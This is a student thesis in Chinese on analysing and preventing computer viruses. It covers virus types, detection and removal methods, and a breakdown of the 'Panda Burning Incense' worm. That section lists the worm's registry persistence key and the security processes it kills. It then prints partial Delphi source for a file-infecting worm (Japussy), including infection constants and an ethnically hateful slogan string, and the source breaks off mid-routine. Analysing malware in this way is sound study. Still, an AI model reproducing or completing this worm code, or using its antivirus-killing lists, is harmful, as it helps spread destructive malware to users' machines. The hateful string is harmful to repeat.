计算机病毒解析与防范.docx
《计算机病毒解析与防范.docx》由会员分享,可在线阅读,更多相关《计算机病毒解析与防范.docx(28页珍藏版)》请在冰点文库上搜索。
计算机病毒解析与防范
陕西师范大学网络教育学院
毕业论文(设计)
论文题目计算机病毒解析与防范
姓名
学号
专业计算机科学与技术
批次/层次
指导教师郭志强
学习中心
摘要....................................................3
1引言..................................................3
2正文..................................................3
2.1计算机病毒的概述...............................3
2.1.1计算机病毒的定义...............................4
2.1.2计算机病毒的特性...............................4
2.2计算机病毒的分类...............................4
2.2.1计算机病毒的基本分类...........................4
2.3计算机病毒防范和清除的基本原则和技术...........6
2.3.1计算机病毒防范的概念和原则.....................6
2.3.2计算机病毒防范基本技术.........................6
2.3.3清除计算机病毒的基本方法......................6
2.4典型计算机病毒的原理、防范和清除...............6
2.4.1引导区计算机病毒...............................7
2.4.2文件型计算机病毒...............................7
2.4.3脚本型计算机病毒...............................8
2.4.4特洛伊木马计算机病毒...........................8
2.4.5蠕虫计算机病毒.................................9
2.5“熊猫烧香”病毒剖析............................9
2.6计算机主要检测技术和特点.........................26
3参考资料.............................................27
计算机病毒与防范
摘要
目前计算机的应用遍及到社会的各个领域,同时计算机病毒也给我们带来了巨大的破坏和潜在的威胁,因此为了确保计算机能够安全工作,计算机病毒的防范工作,已经迫在眉睫。
分析了计算机病毒的特点,讨论了主要从及时清除计算机病毒、局域网病毒的防范、加强计算机网络管理、个人用户的防范,这几个方面去进行计算机病毒的有效防范。
关键词:
计算机病毒防范
1引言
随着计算机在社会生活各个领域的广泛应用,计算机病毒攻击给我们的日常生活和工作中带来了很多的威胁,对于大多数计算机用户来说,谈到“计算机病毒”似乎觉得它深不可测,无法琢磨,其实计算机病毒是可以预防的,为了确保计算机使用的安全性,对计算机进行防范措施是很重要的,本文对此问题进行了探讨。
2正文
2.1计算机病毒的概述
随着社会的不断进步,科学的不断发展,计算机病毒的种类也越来越多,但终究万变不离其宗!
2.1.1计算机病毒的定义
一般来讲,凡是能够引起计算机故障,能够破坏计算机中的资源(包括硬件和软件)的代码,统称为计算机病毒。
而在我国也通过条例的形式给计算机病毒下了一个具有法律性、权威性的定义:
“计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。
”
2.1.2计算机病毒的特性
1、隐藏性与潜伏性
计算机病毒是一种具有很高编程技巧、短精悍的可执行程序。
它通常内附在正常的程序中,用户启动程序同时也打开了病毒程序。
计算机病毒程序经运行取得系统控制权,可以在不到1秒钟的时间里传染几百个程序。
而且在传染操作成后,计算机系统仍能运行,被感染的程序仍能执行,这就是计机病毒传染的隐蔽性……计算机病毒的潜伏性则是指,某些编制巧的计算机病毒程序,进入系统之后可以在几周或者几个月甚至年内隐藏在合法文件中,对其它系统文件进行传染,而不被人发现。
2、传染性
计算机病毒可通过各种渠道(磁盘、共享目录、邮件)从已被感染的计算机扩散到其他机器上,感染其它用户.在某情况下导致计算机工作失常。
3、表现性和破坏性
任何计算机病毒都会对机器产生一定程的影响,轻者占用系统资源,导致系统运行速度大幅降低.重者除文件和数据,导致系统崩溃。
4、可触发性病毒
具有预定的触发条件,可能是时间、日期、文类型或某些特定数据等。
一旦满足触发条件,便启动感染或破坏作,使病毒进行感染或攻击;如不满足,继续潜伏。
有些病毒针对特定的操作系统或特定的计算机。
5、欺骗性和持久性
计算机病毒行动诡秘,计算机对其反应迟,往往把病毒造成的错误当成事实接受下来。
病毒程序即使被发,已被破坏的数据和程序以及操作系统都难以恢复。
在网络操作情况下,由于病毒程序由一个受感染的拷贝通过网络系统反复传,病毒程序的清除愈加复杂。
除了上述五点外,计算机病毒还具有不可预见性、衍生性、针对性、等特点。
正是由于计算机病毒具有这些特点,给计算机病毒的预防、检测与清除工作带来了很大的难度。
2.2计算机病毒的分类
2.2.1计算机病毒的基本分类
1、传统开机型计算机病毒
纯粹的开机型计算机病毒多利用软盘开机时侵入计算机系统,然后再伺机感染其他的软盘或者硬盘,例如:
“Stoned3”(米开朗基罗)。
2、隐形开机型计算机病毒
此类计算机病毒感染的系统,再行检查开机区,得到的将是正常的磁区资料,就好像没有中毒一样,此类计算机病毒不容易被杀毒软件所查杀,而防毒软件对于未知的此类型计算机病毒,必须具有辨认磁区资料真伪的能力。
此类计算机病毒已出现的尚有“Fish”.
3、档案感染型兼开机型计算机病毒
档案感染型兼开机型计算机病毒时利用档案感染时司机感染开机区,因而具有双中的行动能力,此类型较著名的计算机病毒有“Cancer”。
4、目录型计算机病毒
本类型计算机病毒的感染方式非常独特,“Dir2”即其代表,此类计算机病毒仅修改目录区(Root),便可达到其感染目的。
5、传统档案型计算机病毒
传统档案型计算机病毒最大的特征,便是将计算机病毒本身植入档案,使档案膨胀,以达到散播传染的目的。
代表有“13Firday”。
6、千面人计算机病毒
千面人计算机病毒是指具有自我编码能力的计算机病毒,“1701下雨”等,为这种类型主要代表,此种计算机病毒编码的目的,是使其感染的每一个档案,看起来皆不一样,干扰杀毒软件的侦测,不过千面人计算机病毒仍会留下的这个“小辫子”,将其绳之以法。
7、突变引擎病毒
有鉴于前面人计算机病毒一个接一个被截获,边有人编写出一种突变式计算机病毒,使原本千面人计算机病毒无法解决的程序开头相同的问题得到克服,并编写成OBJ副程序,供他人植草此类计算机病毒,即Mctationengine。
尽管如此,这类计算机病毒仅干扰了扫毒式软件,对其他方式的防毒软件并没有太大的影响。
8、隐形档案型计算机病毒
此类病毒可以避开去多防毒软件,因为隐形计算机病毒能直接植入DOS系统的作业环境中,当外部程序呼叫DOS中断服务时,便同时执行到计算机病毒本身,使得计算机病毒能从容地将受其感染的档案,粉饰成正常无毒的样子。
此类计算机病毒有“4096”等。
9、终结型计算机病毒
终结性计算机病毒能追踪磁盘操作终端的原始进入点,当计算机病毒取得磁盘原始中断时,便可任意再磁盘上修改资料或普哦坏资料,而不会惊动防毒程序,这就是说,装有防毒程序和美妆防毒程序的情况是一样的危险。
这类计算机病毒有的采用INT1单步执行的方式,逐步追踪磁盘中断的过程,找出BIOS磁盘中断的部分,供计算机病毒内部使用;有的采用死机的方式,记录几个BIOS版本的磁盘中断原始进入点,当计算机病毒遭到熟悉的BIOS版本,便可直接呼叫磁盘中断,对磁盘予取予求;有的则分析磁盘中断的程序片段,找出BIOS中的相似部分便可直接呼叫磁盘中断。
其代表有“Hammer6”等。
10、Word巨集计算机病毒
Word巨集计算机病毒可以说时目前最新的计算机病毒种类了,它是文件型计算机病毒,异于以往以感染磁盘区或可执行的档案为主的计算机病毒,此类病毒时利用Word提供的巨集功能来感染文件。
目前已经在Internet及BBS网络中发现不少Word巨集计算机病毒,而且此类计算机病毒是用类似Basic程序编写出来的,易学,其反战速度一定很快。
2.3计算机病毒防范和清除的基本原则和技术
2.3.1计算机病毒防范的概念和原则
计算机病毒防范,是指通过建立合理的计算机病毒防范体系和制度,即使发现计算机病毒入侵,并采取有效的手段阻止计算机病毒的传播和破坏,回复受影响的计算机系统和数据。
原则以防御计算机病毒为主动,主要表现在检测行为的动态性和防范方法的广谱性。
2.3.2计算机病毒防范基本技术
计算机病毒预防是在计算机病毒尚未入侵或刚刚入侵,就拦截、阻击计算机病毒的入侵或立即警报。
目前在预防计算机病毒工具中采用的主要技术如下:
2.3.3清除计算机病毒的基本方法
1.简单的工具治疗
简单工具治疗是指使用Debug等简单的工具,借助检测者对某种计算机病毒的具体知识,从感染计算机病毒的软件中摘除计算机代码。
但是,这种方法同样对检测者自身的专业素质要求较高,而且治疗效率也较低。
2.专用工具治疗
使用专用工具治疗被感染的程序时通常使用的治疗方法。
专用计算机治疗工具,根据对计算机病毒特征的记录,自动清除感染程序中的计算机病毒代码,使之得以恢复。
使用专用工具治疗计算机病毒时,治疗操作简单、高效。
从探索与计算机病毒对刚的全过程来看,专用工具的开发商也是先从使用简单工具进行治疗开始,当治疗获得成功后,再研制相应的软件产品,使计算机自动地完成全部治疗操作。
2.4典型计算机病毒的原理、防范和清除
2.4.1引导区计算机病毒
系统引导区时在系统引导的时候,进入到系统中,获得对系统的控制权,在完成其自身的安装后才去引导系统的。
称其为引导区计算机病毒时因为这类计算机病毒一般是都侵占系统硬盘的主引导扇区I/O分区的引导扇区,对于软盘则侵占了软盘的引导扇区。
它会感染在该系统中进行读写操作的所有软盘,然后再由这些软盘以复制的方式和引导进入到其他计算机系统,感染其他计算机的操作系统。
如何检测呢?
1.查看系统内存的总量与正常情况进行比较
2.检查系统内存高端的内容
3.检查系统的INT13H中断向量
4.检查硬盘的主引导扇区、DOS分区引导扇区以及软盘的引导扇区
清除:
用原来正常的分区表信息或引导扇区信息,覆盖掉计算机病毒程序。
此时,如果用户事先提取并保存了自己硬盘中分区表的信息和DOS分区引导扇区信息,那么,恢复工作变得非常简单。
可以直接用Debug将这两种引导扇区的内容分别调入内存,然后分别回它的原来位置,这样就消除了计算机病毒。
2.4.2文件型计算机病毒
文件型计算机病毒程序都是依附在系统可执行文件或覆盖文件上,当文件装入系统执行的时候,引导计算机病毒程序也进入到系统中。
只有极少计算机病毒程序感染数据文件。
此类病毒感染对象大多是系统的可执行文件,也有一些还要对覆盖文件进行传染,而对数据进行传染的则少见。
清除:
1.确定计算机病毒程序的位置,是驻留在文件尾部还是在文件首部。
2.找到计算机病毒程序的首部位置(对应于在文件尾部驻留方式),或者尾部位置(对应于在文件首部驻留方式)。
3.恢复原文件头部的参数。
4.修改文件长度,将源文件写回。
2.4.3脚本型计算机病毒
主要采用脚本语言设计的病毒称其为脚本病毒。
实际上在早期的系统中,计算机病毒就已经开始利用脚本进行传播和破坏,不过专门的脚本病毒并不常见。
但是在脚本应用无所不在的今天,脚本病毒却成为危害最大,最为广泛的病毒,特别是当他和一些传统的恶性病毒相结合时,其危害就更为严重了。
其主要有两种类型,纯脚本型,混合型。
它的特点:
●编写简单
●破坏力大
●感染力强
●传播范围大(多通过E-mail,局域网共享,感染网页文件的方式传播)
●计算机病毒源码容易被获取,变种多
●欺骗性强
●使得计算机病毒生产机事先起来非常容易
清除:
●禁用文件系统对象FileSystemObject
●卸载WindowsScriptingHost
●删除vbs,vbe,js,jse文件后缀与应用程序映射
●在Windows目录中,找到WScript.exe,更改名称或者删除
●要彻底防止vbs网络蠕虫病毒,还需要设置一下浏览器
●禁止OE的自动收发电子邮件功能
●显示所有文件类型的扩展名称
●将系统的网络连接的安全级别设置至少为“中等”
2.4.4特洛伊木马计算机病毒
特洛伊木马也叫黑客程序或后门病毒,是指吟唱在正常程序中的一段具有特殊功能的程序,其隐蔽性及好,不易察觉,是一种极为危险的网络攻击手段。
其第一代:
伪装性病毒,第二代:
AIDS型木马,第三代:
网络传播性木马
如何检查?
●稽查注册表
●检查你的系统配置文件
●清除:
●备份重要数据
●立即关闭身背电源
●备份木马入侵现场
●修复木马危害
2.4.5蠕虫计算机病毒
蠕虫是一种通过网络传播的恶性计算机病毒,它具有计算机病毒的一些共性,如传播性、隐蔽性、破坏性等。
同时自己有自己一些特征,如利用文件寄生,对网络造成拒绝服务以及和黑客技术相结合等。
简单点说,蠕虫就是使用危害的代码来攻击网络上的受害主机,并在受害主机上自我复制,再攻击其他的受害主机的计算机病毒。
其特征:
●自我繁殖
●利用软件漏洞
●造成网络拥堵
●消耗系统资源
●留下安全隐患
清除:
●与防火墙互动
●交换机联动
●通知HIDS(基于主机的入侵检测)
●报警
2.5“熊猫烧香”病毒剖析
“熊猫烧香”病毒感染机理:
“熊猫烧香”,是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。
被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
1:
拷贝文件病毒运行后,会把自己拷贝到C:
\WINDOWS\System32\Drivers\spoclsv.exe
2:
添加注册表自启动病毒会添加自启动项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runsvcshare->C:
\WINDOWS\System32\Drivers\spoclsv.exe
3:
病毒行为
a:
每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序:
QQKav、QQAV、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、SymantecAntiVirus、Duba、esteemproces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、SystemSafetyMonitor、WrappedgiftKiller、WinsockExpert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword,并使用的键盘映射的方法关闭安全软件IceSword。
添加注册表使自己自启动HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runsvcshare->C:
\WINDOWS\System32\Drivers\spoclsv.exe并中止系统中以下的进程:
Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe。
b:
每隔18秒点击病毒作者指定的网页,并用命令行检查系统中是否存在共享,共存在的话就运行netshare命令关闭admin$共享。
c:
每隔10秒下载病毒作者指定的文件,并用命令行检查系统中是否存在共享,共存在的话就运行netshare命令关闭admin$共享。
d:
每隔6秒删除安全软件在注册表中的键值。
并修改以下值不显示隐藏文件HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALLCheckedValue->0x00
删除以下服务:
navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、SymantecCoreLC、NPFMntorMskService、FireSvc。
e:
感染文件
病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部,并在扩展名为htm,html,asp,php,jsp,aspx的文件中添加一网址,用户一但打开了该文件,IE就会不断的在后台点击写入的网址,达到增加点击量的目的,但病毒不会感染以下文件夹名中的文件:
WINDOW、Winnt、SystemVolumeInformation、Recycled、WindowsNT、WindowsUpdate、WindowsMediaPlayer、OutlookExpress、InternetExplorer、NetMeeting、CommonFiles、ComPlusApplications、Messenger、InstallShieldInstallationInformation、MSN、MicrosoftFrontpage、MovieMaker、MSNGaminZone。
g:
删除文件
病毒会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件使用户的系统备份文件丢失。
“熊猫烧香”病毒核心源码
用Delphi写
programJapussy;
uses
Windows,SysUtils,Classes,Graphics,ShellAPI{,Registry};
const
HeaderSize=82432;//病毒体的大小
IconOffset=$12EB8;//PE文件主图标的偏移量
//在我的Delphi5SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize=38912;//Upx压缩过病毒体的大小
IconOffset=$92BC;//Upx压缩过PE文件主图标的偏移量
//Upx1.24W用法:
upx-9--8086Japussy.exe
}
IconSize=$2E8;//PE文件主图标的大小--744字节
IconTail=IconOffset+IconSize;//PE文件主图标的尾部
ID=$44444444;//感染标记
//垃圾码,以备写入
Catchword='Ifaraceneedtobekilledout,itmustbeYamato.'
+
'Ifacountryneedtobedestroyed,itmustbeJapan!
'+
'***W32.Japussy.Worm.A***';
{$R*.RES}
FunctionRegisterServiceProcess()functionRegisterServiceProcess(dwProcessID,dwType:
Integer):
Integer;
stdcall;external'Kernel32.dll';//函数声明
var
TmpFile:
string;
Si:
STARTUPINFO;
Pi:
PROCESS_INFORMATION;
IsJap:
Boolean=False;//日文操作系统标记
{判断是否为Win9x}
FunctionIsWin9x()functionIsWin9x:
Boolean;
var
Ver:
TOSVersionInfo;
begin
Result:
=False;
Ver.dwOSVersionInfoSize:
=SizeOf(TOSVersionInfo);
ifnotGetVersionEx(Ver)then
Exit;
if(Ver.dwPlatformID=VER_PLATFORM_WIN32_WINDOWS)then//Win9x
Result:
=True;
end;
{在流之间复制}
procedureCopyStream(Src:
TStream;sStartPos:
Integer;Dst:
TStream;
dStartPos:
Integer;Count:
Integer);
var
sCurPos,dCurPos:
Integer;
begin
sCurPos:
=Src.Position;
dCurPos:
=Dst.Position;
Src.Seek(sStartPos,0);
Dst.Seek(dStartPos,0);
Dst.CopyFrom(Src,Count);
Src.Seek(sCurPos,0);
Dst.Seek(dCurPos,0);
end;
{将宿主文件从已感染的PE文件中分离出来,以备使用}
procedureExtractFile(FileName:
string);
var
sStream,dStream:
TFileStream;
begin
try
sStream:
=TFileStream.Create(ParamStr(0),fmOpenReador
fmShareDeny